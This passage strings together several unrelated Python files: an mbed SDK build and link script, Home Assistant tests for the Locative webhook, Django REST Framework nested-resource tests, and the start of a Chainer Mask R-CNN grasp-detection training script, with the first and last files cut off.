{ "target": "LPC11U37H_401", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "KL05Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "KL25Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "KL27Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "KL43Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "KL46Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "K20D50M", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "TEENSY3_1", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "K64F", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "K22F", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "LPC4088", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "ARCH_PRO", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC1549", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NRF51822", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DELTA_DFCM_NNN40", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NRF51_DK", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NRF51_MICROBIT", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "EFM32ZG_STK3200", "toolchains": "GCC_ARM", "libs": ["dsp"] },
{ "target": "EFM32HG_STK3400", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb"] },
{ "target": "EFM32LG_STK3600", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb"] },
{ "target": "EFM32GG_STK3700", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb"] },
{ "target": "EFM32WG_STK3800", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb"] },
{ "target": "EFM32PG_STK3401", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos"] },
{ "target": "MAXWSNENV", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "MAX32600MBED", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "MAX32620HSP", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "RZ_A1H", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "SAMR21G18A", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "SAMD21J18A", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "SAMD21G18A", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "SAML21J18A", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "DISCO_L476VG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "NUMAKER_PFM_NUC472", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "NUMAKER_PFM_M453", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
)
################################################################################
# Configure example test building (linking against external mbed SDK libraries liek fat or rtos)
linking_list = [
{"target": "LPC1768",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_15", "MBED_16", "MBED_17"],
"eth" : ["NET_1", "NET_2", "NET_3", "NET_4"],
"fat" : ["MBED_A12", "MBED_19", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "K64F",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"fat" : ["MBED_A12", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "K22F",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"fat" : ["MBED_A12", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "KL43Z",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"fat" : ["MBED_A12", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "NUCLEO_F446ZE",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_F401RE",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_F411RE",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_F412ZG",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
}
},
{"target": "NUCLEO_F429ZI",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_F207ZG",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_F746ZG",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_F767ZI",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_L476RG",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : [ "USB_10", "USB_11"],
}
},
{"target": "DISCO_F429ZI",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : [ "USB_10", "USB_11"],
}
},
{"target": "DISCO_F407VG",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "NUCLEO_F303ZE",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "DISCO_L476VG",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUMAKER_PFM_NUC472",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"fat" : ["MBED_A12", "MBED_19", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "NUMAKER_PFM_M453",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"fat" : ["MBED_A12", "MBED_19", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
}
]
################################################################################
# Driver
def run_builds(dry_run):
for build in build_list:
toolchain_list = build["toolchains"]
if type(toolchain_list) != type([]): toolchain_list = [toolchain_list]
for toolchain in toolchain_list:
cmdline = "python tools/build.py -m %s -t %s -j 4 -c --silent "% (build["target"], toolchain)
libs = build.get("libs", [])
if libs:
cmdline = cmdline + " ".join(["--" + l for l in libs])
print "Executing: " + cmdline
if not dry_run:
if os.system(cmdline) != 0:
sys.exit(1)
def run_test_linking(dry_run):
""" Function run make.py commands to build and link simple mbed SDK
tests against few libraries to make sure there are no simple linking errors.
"""
for link in linking_list:
toolchain_list = link["toolchains"]
if type(toolchain_list) != type([]):
toolchain_list = [toolchain_list]
for toolchain in toolchain_list:
tests = link["tests"]
# Call make.py for each test group for particular library
for test_lib in tests:
test_names = tests[test_lib]
test_lib_switch = "--" + test_lib if test_lib else ""
cmdline = "python tools/make.py -m %s -t %s -c --silent %s -n %s " % (link["target"], toolchain, test_lib_switch, ",".join(test_names))
print "Executing: " + cmdline
if not dry_run:
if os.system(cmdline) != 0:
sys.exit(1)
def run_test_testsuite(dry_run):
cmdline = "python tools/singletest.py --version"
print "Executing: " + cmdline
if not dry_run:
if os.system(cmdline) != 0:
sys.exit(1)
if __name__ == "__main__":
run_builds("-s" in sys.argv)
run_test_linking("-s" in sys.argv)
run_test_testsuite("-s" in sys.argv)
|
|
"""The tests the for Locative device tracker platform."""
from unittest.mock import patch, Mock
import pytest
from homeassistant import data_entry_flow
from homeassistant.components import locative
from homeassistant.components.device_tracker import \
DOMAIN as DEVICE_TRACKER_DOMAIN
from homeassistant.components.locative import DOMAIN, TRACKER_UPDATE
from homeassistant.const import HTTP_OK, HTTP_UNPROCESSABLE_ENTITY
from homeassistant.helpers.dispatcher import DATA_DISPATCHER
from homeassistant.setup import async_setup_component
# pylint: disable=redefined-outer-name
@pytest.fixture(autouse=True)
def mock_dev_track(mock_device_tracker_conf):
"""Mock device tracker config loading."""
pass
@pytest.fixture
def locative_client(loop, hass, hass_client):
"""Locative mock client."""
assert loop.run_until_complete(async_setup_component(
hass, DOMAIN, {
DOMAIN: {}
}))
with patch('homeassistant.components.device_tracker.update_config'):
yield loop.run_until_complete(hass_client())
@pytest.fixture
async def webhook_id(hass, locative_client):
"""Initialize the Geofency component and get the webhook_id."""
hass.config.api = Mock(base_url='http://example.com')
result = await hass.config_entries.flow.async_init('locative', context={
'source': 'user'
})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM, result
result = await hass.config_entries.flow.async_configure(
result['flow_id'], {})
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
return result['result'].data['webhook_id']
async def test_missing_data(locative_client, webhook_id):
"""Test missing data."""
url = '/api/webhook/{}'.format(webhook_id)
data = {
'latitude': 1.0,
'longitude': 1.1,
'device': '123',
'id': 'Home',
'trigger': 'enter'
}
# No data
req = await locative_client.post(url)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No latitude
copy = data.copy()
del copy['latitude']
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No device
copy = data.copy()
del copy['device']
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No location
copy = data.copy()
del copy['id']
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No trigger
copy = data.copy()
del copy['trigger']
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# Test message
copy = data.copy()
copy['trigger'] = 'test'
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_OK
# Test message, no location
copy = data.copy()
copy['trigger'] = 'test'
del copy['id']
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_OK
# Unknown trigger
copy = data.copy()
copy['trigger'] = 'foobar'
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
async def test_enter_and_exit(hass, locative_client, webhook_id):
"""Test when there is a known zone."""
url = '/api/webhook/{}'.format(webhook_id)
data = {
'latitude': 40.7855,
'longitude': -111.7367,
'device': '123',
'id': 'Home',
'trigger': 'enter'
}
# Enter the Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device'])).state
assert state_name == 'home'
data['id'] = 'HOME'
data['trigger'] = 'exit'
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device'])).state
assert state_name == 'not_home'
data['id'] = 'hOmE'
data['trigger'] = 'enter'
# Enter Home again
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device'])).state
assert state_name == 'home'
data['trigger'] = 'exit'
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device'])).state
assert state_name == 'not_home'
data['id'] = 'work'
data['trigger'] = 'enter'
# Enter Work
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device'])).state
assert state_name == 'work'
async def test_exit_after_enter(hass, locative_client, webhook_id):
"""Test when an exit message comes after an enter message."""
url = '/api/webhook/{}'.format(webhook_id)
data = {
'latitude': 40.7855,
'longitude': -111.7367,
'device': '123',
'id': 'Home',
'trigger': 'enter'
}
# Enter Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device']))
assert state.state == 'home'
data['id'] = 'Work'
# Enter Work
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device']))
assert state.state == 'work'
data['id'] = 'Home'
data['trigger'] = 'exit'
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device']))
assert state.state == 'work'
async def test_exit_first(hass, locative_client, webhook_id):
"""Test when an exit message is sent first on a new device."""
url = '/api/webhook/{}'.format(webhook_id)
data = {
'latitude': 40.7855,
'longitude': -111.7367,
'device': 'new_device',
'id': 'Home',
'trigger': 'exit'
}
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device']))
assert state.state == 'not_home'
@pytest.mark.xfail(
reason='The device_tracker component does not support unloading yet.'
)
async def test_load_unload_entry(hass, locative_client, webhook_id):
"""Test that the appropriate dispatch signals are added and removed."""
url = '/api/webhook/{}'.format(webhook_id)
data = {
'latitude': 40.7855,
'longitude': -111.7367,
'device': 'new_device',
'id': 'Home',
'trigger': 'exit'
}
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device']))
assert state.state == 'not_home'
assert len(hass.data[DATA_DISPATCHER][TRACKER_UPDATE]) == 1
entry = hass.config_entries.async_entries(DOMAIN)[0]
await locative.async_unload_entry(hass, entry)
await hass.async_block_till_done()
assert not hass.data[DATA_DISPATCHER][TRACKER_UPDATE]
|
|
from django.test import TestCase
from django.db.models.manager import Manager
from django.core.exceptions import ImproperlyConfigured
from rest_framework import serializers
from drf_nested_resource.utils import (
find_child_to_parent_accessor_name,
find_child_to_parent_serializer_field,
compute_default_url_kwarg_for_parent,
find_parent_to_child_manager,
)
from tests.models import (
TargetModel,
ForeignKeySourceModel,
ForeignKeySourceNoRelatedNameModel,
GenericForeignKeySourceModel,
ManyToManyTargetModel,
ManyToManySourceModel,
ManyToManySourceNoRelatedNameModel,
SelfReferencingManyToManyModel,
ManyToManyTowardsSelfReference,
)
class FindRelationshipFieldTest(TestCase):
def test_raises_integrity_error_when_no_relationship_found(self):
with self.assertRaises(ImproperlyConfigured):
find_child_to_parent_accessor_name(
parent_model=ForeignKeySourceModel,
child_model=TargetModel,
)
def test_on_foreign_key_relationship(self):
"""
Test finding the field that represents the parent/child relationship in
a normal `ForeignKey` backed relationship.
"""
attname = find_child_to_parent_accessor_name(
parent_model=TargetModel,
child_model=ForeignKeySourceModel,
)
self.assertEqual(attname, 'target')
def test_on_generic_foreign_key_relationship(self):
"""
Test finding the field that represents the parent/child relationship in
a `GenericForeignKey` backed relationship.
"""
attname = find_child_to_parent_accessor_name(
parent_model=TargetModel,
child_model=GenericForeignKeySourceModel,
)
self.assertEqual(attname, 'object')
def test_on_many_to_many_relationship(self):
"""
Test finding the field that represents the parent/child relationship in
a `ManyToManyField` backed relationship when the child model is the one
which has the `ManyToManyField` declared on it.
"""
attname = find_child_to_parent_accessor_name(
parent_model=ManyToManyTargetModel,
child_model=ManyToManySourceModel,
)
self.assertEqual(attname, 'targets')
def test_on_many_to_many_relationship_from_other_side(self):
"""
Test finding the field that represents the parent/child relationship in
a `ManyToManyField` backed relationship when the parent model is the one
which has the `ManyToManyField` declared on it.
"""
attname = find_child_to_parent_accessor_name(
parent_model=ManyToManySourceModel,
child_model=ManyToManyTargetModel,
)
self.assertEqual(attname, 'sources')
#
# Test Serializers for testing `find_child_to_parent_serializer_field`
#
class NoSuffixSerializer(serializers.ModelSerializer):
class Meta:
model = ForeignKeySourceModel
fields = ('id', 'target')
class WithSuffixSerializer(serializers.ModelSerializer):
target_id = serializers.Field()
class Meta:
model = ForeignKeySourceModel
fields = ('id', 'target_id')
class BaseInheritedSerializer(serializers.ModelSerializer):
target = serializers.PrimaryKeyRelatedField()
class Meta:
model = ForeignKeySourceModel
fields = ('id', 'target')
class InheritedSerializer(BaseInheritedSerializer):
pass
class FindSerializerFieldTest(TestCase):
def test_on_non_suffixed_field_name(self):
"""
Test that the serializer field can be found when it is the same name as
the child to parent accessor attribute name.
"""
field_name = find_child_to_parent_serializer_field(
NoSuffixSerializer,
'target',
)
self.assertEqual(field_name, 'target')
def test_on_suffixed_field_name(self):
"""
Test that the serializer field can be found when the serializer field
has the `_id` suffix as is sometimes the case with `ForeignKey` fields.
"""
field_name = find_child_to_parent_serializer_field(
WithSuffixSerializer,
'target',
)
self.assertEqual(field_name, 'target_id')
def test_on_inherited_serializer(self):
"""
Test that a field declared on a base class of the serializer is still
found. Just in case there is something fishy going on with
`serializer.base_fields`.
"""
field_name = find_child_to_parent_serializer_field(
InheritedSerializer,
'target',
)
self.assertEqual(field_name, 'target')
class ComputeURLKwargForParentTest(TestCase):
"""
Test the `compute_default_url_kwarg_for_parent` function is able to come up
with sensable defaults for what the url kwarg *should* be when representing
various relationships for `/parents/<url_kwarg>/children/`
"""
def test_foreign_key_relationship_kwarg_computation(self):
"""
For the relationship where ChildParent.parent is a ForeignKey field
which points to the ParentModel
"""
url_kwarg = compute_default_url_kwarg_for_parent(
parent_model=TargetModel,
child_model=ForeignKeySourceModel,
)
self.assertEqual(url_kwarg, 'target_pk')
def test_generic_foreign_key_relationship_kwarg_computation(self):
url_kwarg = compute_default_url_kwarg_for_parent(
parent_model=TargetModel,
child_model=GenericForeignKeySourceModel,
)
self.assertEqual(url_kwarg, 'target_model_pk')
def test_many_to_many_relationship(self):
url_kwarg = compute_default_url_kwarg_for_parent(
parent_model=ManyToManyTargetModel,
child_model=ManyToManySourceModel,
)
self.assertEqual(url_kwarg, 'target_pk')
def test_many_to_many_from_other_side_of_relationship(self):
url_kwarg = compute_default_url_kwarg_for_parent(
parent_model=ManyToManySourceModel,
child_model=ManyToManyTargetModel,
)
self.assertEqual(url_kwarg, 'source_pk')
class GetParentToChildManagerTest(TestCase):
"""
Test that the `find_parent_to_child_manager` function is able to find the
manager from the parent object to the child objects for all supported
relationships.
"""
def assertManagersEqual(self, manager_a, manager_b):
"""
The manager class that django uses for reverse relationships is
constructed dynamically using code generation so this is an
approximation guaranteeing they are the same.
"""
self.assertIsInstance(manager_a, Manager)
self.assertIsInstance(manager_b, Manager)
self.assertEqual(manager_a.model, manager_b.model)
self.assertEqual(
str(manager_a.all().query),
str(manager_b.all().query),
)
def test_foreign_key_relationship_with_declared_related_name(self):
parent_obj = TargetModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=ForeignKeySourceModel,
)
self.assertManagersEqual(manager, parent_obj.sources)
def test_foreign_key_relationship_without_related_name(self):
parent_obj = TargetModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=ForeignKeySourceNoRelatedNameModel,
)
self.assertManagersEqual(manager, parent_obj.foreignkeysourcenorelatednamemodel_set)
def test_generic_foreign_key_relationship(self):
parent_obj = TargetModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=GenericForeignKeySourceModel,
)
self.assertManagersEqual(manager, parent_obj.generic_sources)
def test_many_to_many_relationship_with_declared_related_name(self):
parent_obj = ManyToManyTargetModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=ManyToManySourceModel,
)
self.assertManagersEqual(manager, parent_obj.sources)
def test_many_to_many_relationship_from_other_side_with_declared_related_name(self):
parent_obj = ManyToManySourceModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=ManyToManyTargetModel,
)
self.assertManagersEqual(manager, parent_obj.targets)
def test_many_to_many_relationship_without_related_name(self):
parent_obj = ManyToManyTargetModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=ManyToManySourceNoRelatedNameModel,
)
self.assertManagersEqual(
manager,
parent_obj.manytomanysourcenorelatednamemodel_set,
)
def test_many_to_many_relationship_from_other_side_without_related_name(self):
parent_obj = ManyToManySourceNoRelatedNameModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=ManyToManyTargetModel,
)
self.assertManagersEqual(manager, parent_obj.targets)
def test_many_to_many_relationship_with_self(self):
parent_obj = SelfReferencingManyToManyModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=SelfReferencingManyToManyModel,
)
self.assertManagersEqual(manager, parent_obj.targets)
def test_m2m_towards_self_referencing_model(self):
parent_obj = ManyToManyTowardsSelfReference.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=SelfReferencingManyToManyModel,
)
self.assertManagersEqual(manager, parent_obj.targets)
|
|
#!/usr/bin/env python
from __future__ import division
import argparse
import datetime
import functools
import os.path as osp
import PIL.Image
import random
import socket
import chainer
from chainer import training
from chainer.training import extensions
import chainer_mask_rcnn as cmr
from chainercv import transforms
from chainercv.utils.mask.mask_to_bbox import mask_to_bbox
import fcn
import numpy as np
from grasp_data_generator.datasets import FinetuningOIDualarmGraspDatasetV1
from grasp_data_generator.datasets import FinetuningOIDualarmGraspDatasetV2
from grasp_data_generator.datasets import FinetuningOIDualarmGraspDatasetV3
from grasp_data_generator.datasets import OIDualarmGraspDatasetV1
from grasp_data_generator.datasets import OIDualarmGraspDatasetV2
from grasp_data_generator.datasets import OIRealAnnotatedDatasetV1
from grasp_data_generator.datasets import OIRealAnnotatedDatasetV2
from grasp_data_generator.extensions import ManualScheduler
from grasp_data_generator.models import OccludedGraspMaskRCNNResNet101
from grasp_data_generator.models import OccludedGraspMaskRCNNTrainChain
thisdir = osp.dirname(osp.abspath(__file__))
class Transform(object):
def __init__(self, occluded_mask_rcnn):
self.occluded_mask_rcnn = occluded_mask_rcnn
def __call__(self, in_data):
if len(in_data) == 5:
img, ins_label, label, sg_mask, dg_mask = in_data
rotation = None
elif len(in_data) == 3:
img, ins_label, label = in_data
else:
img, ins_label, label, sg_mask, dg_mask, rotation = in_data
bbox = mask_to_bbox(ins_label != 0)
_, orig_H, orig_W = img.shape
img = self.occluded_mask_rcnn.prepare(img)
_, H, W = img.shape
scale = H / orig_H
ins_label = transforms.resize(ins_label, (H, W), PIL.Image.NEAREST)
bbox = transforms.resize_bbox(bbox, (orig_H, orig_W), (H, W))
if len(in_data) > 3:
sg_mask = transforms.resize(
sg_mask.astype(np.float32), (H, W))
dg_mask = transforms.resize(
dg_mask.astype(np.float32), (H, W))
if len(in_data) == 5:
return img, ins_label, label, bbox, scale, sg_mask, dg_mask
elif len(in_data) == 3:
return img, ins_label, label, bbox, scale
else:
return img, ins_label, label, bbox, scale, \
sg_mask, dg_mask, rotation
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--dataset', default='v2', help='Dataset version',
choices=['v1', 'v2', 'fv1', 'fv2', 'fv3', 'ev1', 'ev2'])
parser.add_argument('--gpu', '-g', type=int, help='GPU id.')
parser.add_argument('--multi-node', action='store_true',
help='use multi node')
parser.add_argument('--max-epoch', type=float,
default=12, help='epoch')
parser.add_argument('--seed', '-s', type=int, default=1234)
parser.add_argument('--lr-base', type=float,
default=0.0025, help='lr_base')
parser.add_argument('--pretrained-model', type=str, default=None)
parser.add_argument('--finetune', action='store_true',
help='use finetune node')
parser.add_argument('--no-grasp', action='store_true',
help='use no grasp node')
parser.add_argument('--alpha-graspable', type=float, default=0.05)
args = parser.parse_args()
if args.multi_node:
import chainermn
comm = chainermn.create_communicator('hierarchical')
device = comm.intra_rank
args.n_node = comm.inter_size
args.n_gpu = comm.size
chainer.cuda.get_device_from_id(device).use()
else:
args.n_node = 1
args.n_gpu = 1
chainer.cuda.get_device_from_id(args.gpu).use()
device = args.gpu
now = datetime.datetime.now()
random.seed(args.seed)
np.random.seed(args.seed)
# Default Config
# args.min_size = 800
# args.max_size = 1333
# args.anchor_scales = (2, 4, 8, 16, 32)
args.min_size = 600
args.max_size = 1000
args.anchor_scales = (4, 8, 16, 32)
args.rpn_dim = 512
if not args.multi_node or comm.rank == 0:
out = osp.join(thisdir, 'logs', now.strftime('%Y%m%d_%H%M%S.%f'))
else:
out = None
if args.multi_node:
args.out = comm.bcast_obj(out)
else:
args.out = out
del out
# 0.00125 * 8 = 0.01 in original
args.batch_size = 1 * args.n_gpu
args.lr_base = args.lr_base * args.batch_size
args.weight_decay = 0.0001
args.step_size = [2 / 3 * args.max_epoch, 8 / 9 * args.max_epoch]
# -------------------------------------------------------------------------
# Dataset
if args.dataset == 'v1':
args.rotate_angle = None
train_data = OIDualarmGraspDatasetV1(
split='train', return_rotation=False)
# test_data = OIDualarmGraspDatasetV1(split='test', imgaug=False)
elif args.dataset == 'v2':
args.rotate_angle = 30
train_data = OIDualarmGraspDatasetV2(
split='train', return_rotation=True)
# test_data = OIDualarmGraspDatasetV2(split='test', imgaug=False)
elif args.dataset == 'fv1':
args.rotate_angle = 30
train_data = FinetuningOIDualarmGraspDatasetV1(
split='train', return_rotation=True)
# test_data = FinetuningOIDualarmGraspDatasetV1(
# split='test', imgaug=False)
elif args.dataset == 'fv2':
args.rotate_angle = 30
train_data = FinetuningOIDualarmGraspDatasetV2(
split='train', return_rotation=True)
# test_data = FinetuningOIDualarmGraspDatasetV2(
# split='test', imgaug=False)
elif args.dataset == 'fv3':
args.rotate_angle = 30
train_data = FinetuningOIDualarmGraspDatasetV3(
split='train', return_rotation=True)
# test_data = FinetuningOIDualarmGraspDatasetV2(
# split='test', imgaug=False)
elif args.dataset == 'ev1':
args.rotate_angle = 30
train_data = OIRealAnnotatedDatasetV1(split='all', imgaug=True)
elif args.dataset == 'ev2':
args.rotate_angle = 30
train_data = OIRealAnnotatedDatasetV2(split='all', imgaug=True)
else:
raise ValueError(
'Given dataset is not supported: {}'.format(args.dataset))
label_names = train_data.label_names
# -------------------------------------------------------------------------
# Model + Optimizer.
occluded_grasp_mask_rcnn = OccludedGraspMaskRCNNResNet101(
n_fg_class=len(label_names),
anchor_scales=args.anchor_scales,
min_size=args.min_size,
max_size=args.max_size,
rpn_dim=args.rpn_dim,
rotate_angle=args.rotate_angle)
occluded_grasp_mask_rcnn.nms_thresh = 0.3
occluded_grasp_mask_rcnn.score_thresh = 0.05
if args.pretrained_model is not None:
chainer.serializers.load_npz(
